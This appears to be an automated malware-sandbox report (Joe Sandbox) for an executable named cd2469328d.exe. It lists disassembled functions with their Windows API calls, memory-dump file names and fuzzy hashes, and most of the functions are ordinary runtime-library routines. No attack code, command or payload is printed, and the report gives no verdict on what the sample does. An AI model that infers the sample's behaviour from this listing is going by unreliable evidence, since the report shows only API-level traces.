Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
Instruction ID: 73d27788cc7b1538f42214c9b23418ce1bd0bdafee5620fa0bd44376dcdd11d5
Opcode Fuzzy Hash: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
Instruction Fuzzy Hash: 86510472A04606AFDB2B9F14E8C1B7AB7B4FF01311F15412DE8429B6A1E731ED80CB90

Function 00343537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0034359B
__dosmaperr.LIBCMT ref: 003435A2
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003435DC
__dosmaperr.LIBCMT ref: 003435E3

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
Instruction ID: 6a25f544a8b9b1920370be5020e40ff272eafe5c8c813a8f76c5a6d121860de0
Opcode Fuzzy Hash: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
Instruction Fuzzy Hash: 9A21A471600605AFDB23AF66988182ABBECFF01364B118559F8659F651DB30FF508B91

Function 00338042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
Instruction ID: d31d615f1226ce521cfc43d5649b81497c4eff1d6395b28d64e41bff67f054ff
Opcode Fuzzy Hash: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
Instruction Fuzzy Hash: DC21DCB1604705BFDB27AF618CC092AB7ACAF00364F118628F8699B651EF30EC0087A1

Function 0034484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00344857

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0034488F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003448AF

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 254cfb3144ce863b9b9c333f5fe3227bd70ff753bea05b1f816174b8e0567cff
Instruction ID: 2e50263731bb21d20e5fe0fa46e9942daa594fde1c7e61aca3e97969d86c41e7
Opcode Fuzzy Hash: 254cfb3144ce863b9b9c333f5fe3227bd70ff753bea05b1f816174b8e0567cff
Instruction Fuzzy Hash: 981126F65026657FA71327B69CCEEBF29ACDE853D5B200434F401D9141FB65EE0192B1

Function 0033457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00334582
std::_Lockit::_Lockit.LIBCPMT ref: 0033458C

Part of subcall function 003324C2: std::_Lockit::_Lockit.LIBCPMT ref: 003324DE
Part of subcall function 003324C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003324F7

codecvt.LIBCPMT ref: 003345C6
std::_Lockit::~_Lockit.LIBCPMT ref: 003345FD

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
Instruction ID: 4d60e1b9acd9c8826087f85ae69875ecba73944f3398a063c8a195f0ff47a95b
Opcode Fuzzy Hash: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
Instruction Fuzzy Hash: 6101F575900615CBCF07EFA4D8966AEB7B5FF55710F250508F411AF2A1CF74AE018791

Function 0034A4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000), ref: 0034A4F7
GetLastError.KERNEL32(?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?,?,00345365,00000000), ref: 0034A503

Part of subcall function 0034A554: CloseHandle.KERNEL32(FFFFFFFE,0034A513,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?), ref: 0034A564

___initconout.LIBCMT ref: 0034A513

Part of subcall function 0034A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0034A4D1,00349AFC,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A548

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A528

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
Instruction ID: 850bfd324bc36171fc1b49dcc2a228f530fc84bd8c28ae0f736ecb2d530f0839
Opcode Fuzzy Hash: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
Instruction Fuzzy Hash: 6CF03036050715BFCF231F95EC0999E3F6AFF893A2F014550FA498E130D63299209B92

Function 003359A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 003359B9
GetCurrentThreadId.KERNEL32 ref: 003359C8
GetCurrentProcessId.KERNEL32 ref: 003359D1
QueryPerformanceCounter.KERNEL32(?), ref: 003359DE

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
Instruction ID: 7b426bf5a424b9a96f28fbde2b07c0eec278c19cad0528da278e384c862c67df
Opcode Fuzzy Hash: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
Instruction Fuzzy Hash: 37F0AF70D1120CEBCB01DBB4C94999EFBF8FF1C301B914996A412E7120E730AB448F50

Function 00342117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003421D6
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?), ref: 0034220D

Strings

utf8, xrefs: 003422DF

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
Instruction ID: 59f9495555860252f8a5d90802b8655cacd655d99ea89ac804bf5ff454a55345
Opcode Fuzzy Hash: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
Instruction Fuzzy Hash: 6A51E675640305AADB27AB748C82BAB73E8EF44740F960429FA45FF181FBB4F9408661

Function 0033DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0033DEAD,?,?,00000000,00000000,00000000,?), ref: 0033DFD1

Strings

MOC, xrefs: 0033DFE3
RCC, xrefs: 0033DFEB

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
Instruction ID: 6832b44ba00bb5470a1a0579ed5b7a189e2c35d06e17bdeb6d710891df54f431
Opcode Fuzzy Hash: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
Instruction Fuzzy Hash: EB416A75900209AFCF2ADF99DCC1AEEBBB5FF48304F198059FA04AB2A1D3759950DB50

Function 0033D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0033DA8F

Strings

csm, xrefs: 0033DAB1
csm, xrefs: 0033DB22

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
Instruction ID: 38b9783ec555db0397c5be45d1619ac59bbb7b2c94dfcf46af2d65e70c71819e
Opcode Fuzzy Hash: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
Instruction Fuzzy Hash: 2931D336904358EBCF239F50ECC09AABB65FF08366F1A415AF8544A221C332DDA1DB91

Function 003329C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334B74
___raise_securityfailure.LIBCMT ref: 00334C5C

Strings

xf5, xrefs: 00334C57

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf5
API String ID: 3761405300-3233278200
Opcode ID: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
Instruction ID: ae0045f139252531c4e8317b9b3654f9b0213b535595028786e2403dd990333f
Opcode Fuzzy Hash: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
Instruction Fuzzy Hash: F121BCB45013009BE742CF25E996A447BF8FB4C71AF90A12AE5098B2B0E3B1A981CF44

Function 00334A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334A97
___raise_securityfailure.LIBCMT ref: 00334B54

Strings

xf5, xrefs: 00334B4F

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf5
API String ID: 3761405300-3233278200
Opcode ID: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
Instruction ID: 49955a5a2f8e361df205bd5cda239a701fc750f7933f95105447d64667ecc4bd
Opcode Fuzzy Hash: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
Instruction Fuzzy Hash: 79117CB45113049FD742DF29E9926847BF8FB5C30AF81A16AE8098B3B0E7B1A941DF45

Function 003329D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(0035648C,ios_base::badbit set,?,?,00331C84,00356478,00331B17), ref: 003329DF
ReleaseSRWLockExclusive.KERNEL32(0035648C,?,?,00331C84,00356478,00331B17), ref: 00332A19

Strings

ios_base::badbit set, xrefs: 003329D8

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ios_base::badbit set
API String ID: 17069307-3882152299
Opcode ID: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
Instruction ID: c68281c861aa9789a1de3e04c7269859f17442c06503819a2f82e2d8ebc08e7c
Opcode Fuzzy Hash: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
Instruction Fuzzy Hash: 62F0A034500200DFCB22AF19E884B26BBBCFB85776F10032EE89A476B0CB312842CA51

Analysis Process: cd2469328d.exePID: 7808, Parent PID: 7664COMMON

Non-executed Functions

Function 00343178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 00343211
GetLocaleInfoW.KERNEL32(?,20001004,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 0034323A
GetACP.KERNEL32(?,?,00342B49,?,00000000), ref: 0034324F

Strings

ACP, xrefs: 00343196
OCP, xrefs: 003431CC

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
Instruction ID: 8aeb6df0ff504761a8a55181b15ebaa4dc90fc8ebeef7be550dec4e94857a289
Opcode Fuzzy Hash: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
Instruction Fuzzy Hash: 8421AC32600105AADB379F64D805BAB73EAAF94B50B278824E90ADF120E772FF40D750

Function 00342A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00342B1B
IsValidCodePage.KERNEL32(00000000), ref: 00342B59
IsValidLocale.KERNEL32(?,00000001), ref: 00342B6C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00342BB4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00342BCF

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
Instruction ID: c094710c0944b4c8c9d8e9a3f819a19409c888755eeb19e69a3870340a802e1a
Opcode Fuzzy Hash: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
Instruction Fuzzy Hash: DD514F71A00215AEDB22DFA4CC85AAF77F8FF14701F964469B901FF191DB70AA44CB61

Function 00331614 Relevance: 7.7, APIs: 5, Instructions: 171fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9

GetFileSize.KERNEL32(00000000,00000000), ref: 00331685
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003316AB
CloseHandle.KERNEL32(00000000), ref: 003316BA
_strlen.LIBCMT ref: 00331705
CloseHandle.KERNEL32(00000000), ref: 00331805

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: CloseFileHandle_strlen$ReadSize
String ID:
API String ID: 1490117831-0
